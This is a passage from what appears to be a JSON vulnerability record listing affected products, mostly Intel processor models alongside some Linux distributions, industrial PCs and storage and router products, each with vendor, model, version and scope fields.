        "trust": 1.0,
        "vendor": "intel",
        "version": "4300y"
      },
      {
        "model": "bl ppc15 7000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n3160"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2367m"
      },
      {
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3740"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4130"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6102e"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "560um"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4460s"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3687u"
      },
      {
        "model": "xeon e3 1225 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6100u"
      },
      {
        "model": "core m",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5y10"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "l5618"
      },
      {
        "model": "xeon e5 2418l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5 2648l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "atom e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e3827"
      },
      {
        "model": "xeon silver",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4114t"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4610"
      },
      {
        "model": "xeon e5 2618l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n2806"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2350m"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3340s"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6200u"
      },
      {
        "model": "xeon e5 2440",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "14.04"
      },
      {
        "model": "simatic itc1900 pro",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "3.1"
      },
      {
        "model": "vl2 ppc12 1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "model": "xeon e5 2603 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon phi",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7210"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2890_v2"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x6550"
      },
      {
        "model": "linux enterprise server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "12"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8250u"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2348m"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4690t"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4771"
      },
      {
        "model": "xeon e3 1285 v6",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "17.04"
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6130f"
      },
      {
        "model": "xeon e5 2618l v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5 2640 v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5 2618l v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "btc12",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "pepperl fuchs",
        "version": null
      },
      {
        "model": "celeron j",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "j1850"
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6134"
      },
      {
        "model": "xeon e3 1276 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "bl ppc12 1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3460"
      },
      {
        "model": "xeon e3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "1575m_v5"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2690"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4627_v3"
      },
      {
        "model": "xeon e3 1240 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5 2620 v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4702mq"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4627_v2"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2820qm"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4807"
      },
      {
        "model": "xeon e5 2407 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4712mq"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2380p"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2115c"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2520m"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "680um"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "640m"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2715qe"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3227u"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2820"
      },
      {
        "model": "bl ppc17 1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "430um"
      },
      {
        "model": "xeon e5 2430l v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4860_v2"
      },
      {
        "model": "xeon e5 1620 v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n2910"
      },
      {
        "model": "pentium j",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "j2900"
      },
      {
        "model": "xeon e3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "1585_v5"
      },
      {
        "model": "xeon e3 1105c v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e3 1265l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8550u"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "530"
      },
      {
        "model": "xeon e5 2428l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4809_v2"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4160t"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "8.0"
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2308"
      },
      {
        "model": "celeron j",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "j3060"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6157u"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2430m"
      },
      {
        "model": "xeon platinum",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8160"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8890_v3"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2500"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "330m"
      },
      {
        "model": "xeon e3 12201 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x3470"
      },
      {
        "model": "xeon e3 1230",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2680"
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6138t"
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5118"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "540um"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "930"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4550u"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8350k"
      },
      {
        "model": "bl2 ppc 7000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2850_v2"
      },
      {
        "model": "bl bpc 2000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "model": "atom x3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3235rk"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2390t"
      },
      {
        "model": "dl ppc15 1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "model": "xeon platinum",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8170"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "350m"
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2538"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5520"
      },
      {
        "model": "xeon e5 2418l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon platinum",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8176f"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7700t"
      },
      {
        "model": "solidfire",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "390m"
      },
      {
        "model": "xeon e3 1290 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "330um"
      },
      {
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n2940"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2649m"
      },
      {
        "model": "router manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "synology",
        "version": "1.1.7-6941-1"
      },
      {
        "model": "pentium n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n4200"
      },
      {
        "model": "xeon silver",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4110"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2697_v2"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5504"
      },
      {
        "model": "xeon e3 1245 v5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "l5508"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8870_v2"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3820qm"
      },
      {
        "model": "xeon e3 1280 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e3 1281 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2100"
      },
      {
        "model": "diskstation manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "synology",
        "version": "5.2"
      },
      {
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z2560"
      },
      {
        "model": "xeon platinum",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8156"
      },
      {
        "model": "xeon e3 1268l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "celeron j",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "j3455"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2960xm"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4850_v4"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4020y"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7820eq"
      },
      {
        "model": "core m",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5y51"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "l5520"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5300u"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2687w"
      },
      {
        "model": "xeon e5 1660",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "bl rackmount 4u",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "model": "xeon e5 1680 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5506"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5649"
      },
      {
        "model": "xeon e3 1275 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4150t"
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6130"
      },
      {
        "model": "xeon e5 2420",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4820_v2"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4790"
      },
      {
        "model": "xeon e3 1230 v6",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "660"
      },
      {
        "model": "bl ppc17 7000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6402p"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4860"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4603_v2"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8830"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3330"
      },
      {
        "model": "xeon e5 1428l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3470s"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2720qm"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "ec5539"
      },
      {
        "model": "xeon e5 1660 v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4800mq"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3540m"
      },
      {
        "model": "xeon e3 1505m v5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "celeron j",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "j1800"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4603"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5675r"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4650"
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2350"
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2758"
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3338"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3225"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2860"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4860hq"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5775c"
      },
      {
        "model": "cortex-r8",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arm",
        "version": null
      },
      {
        "model": "pentium j",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "j3710"
      },
      {
        "model": "pentium n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n3520"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3439y"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3570k"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7y75"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4278u"
      },
      {
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n2820"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3537u"
      },
      {
        "model": "core m5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6y57"
      },
      {
        "model": "xeon e3 1271 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e3 1286 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4820_v4"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8700"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4648_v3"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5675c"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "480m"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "740qm"
      },
      {
        "model": "core m3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7y32"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4950hq"
      },
      {
        "model": "xeon e3 1286l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2657m"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8400"
      },
      {
        "model": "xeon phi",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7290"
      },
      {
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3530"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "610e"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5700eq"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2620m"
      },
      {
        "model": "xeon bronze 3104",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e3 1230 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e3 1280 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5119t"
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6148f"
      },
      {
        "model": "linux enterprise desktop",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "12"
      },
      {
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n3150"
      },
      {
        "model": "bl ppc17 3000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3110m"
      },
      {
        "model": "xeon e3 1270 v6",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "620le"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "950"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2658a_v3"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2328m"
      },
      {
        "model": "xeon e5 2630",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e3 1225 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4620_v4"
      },
      {
        "model": "neoverse n2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arm",
        "version": null
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "560"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "661"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "380um"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "650"
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5120"
      },
      {
        "model": "xeon e3 1240l v5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4130t"
      },
      {
        "model": "xeon e5 2630 v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3120m"
      },
      {
        "model": "bl2 ppc 2000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n3000"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3520m"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x5675"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4640_v3"
      },
      {
        "model": "xeon e5 1428l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5 2608l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5775r"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4640"
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3308"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2697_v3"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "l5640"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4150"
      },
      {
